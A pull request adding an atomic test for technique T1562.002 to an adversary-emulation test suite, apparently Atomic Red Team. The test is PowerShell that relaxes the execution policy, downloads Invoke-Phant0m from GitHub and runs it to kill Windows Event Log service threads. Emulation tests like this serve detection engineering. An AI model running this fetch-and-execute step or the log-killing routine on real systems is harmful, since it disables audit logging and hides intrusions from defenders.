### PR TITLE
Update T1562.002.yaml - Invoke-Phant0m

### DIFF
--- a/atomics/T1562.002/T1562.002.yaml
+++ b/atomics/T1562.002/T1562.002.yaml
@@ -21,3 +21,21 @@ atomic_tests:
         C:\Windows\System32\inetsrv\appcmd.exe set config "#{website_name}" /section:httplogging /dontLog:false *>$null
       }
     name: powershell
+- name: Kill Event Log Service Threads
+  description: 'Kill Windows Event Log Service Threads using Invoke-Phant0m. WARNING you will need to restart PC to return to normal state with Log Service. https://artofpwn.com/phant0m-killing-windows-event-log.html'
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore
+      $url = "https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke-Phant0m.ps1"
+      $output = "$env:TEMP\Invoke-Phant0m.ps1"
+      $wc = New-Object System.Net.WebClient
+      $wc.DownloadFile($url, $output)
+      cd $env:TEMP
+      Import-Module .\Invoke-Phant0m.ps1
+      Invoke-Phant0m
+    cleanup_command: |-
+      Write-Host "NEED TO Restart-Computer TO ENSURE LOGGING RETURNS" -fore red
+    name: powershell
+    elevation_required: true


### PR DESCRIPTION
Update T1562.002.yaml with Invoke-Phant0m to Kill Windows Event Log Services Threads.

**Details:**
Kills Windows Log Services Threads

**Testing:**
local test

**Associated Issues:**
Add an additional atomic-test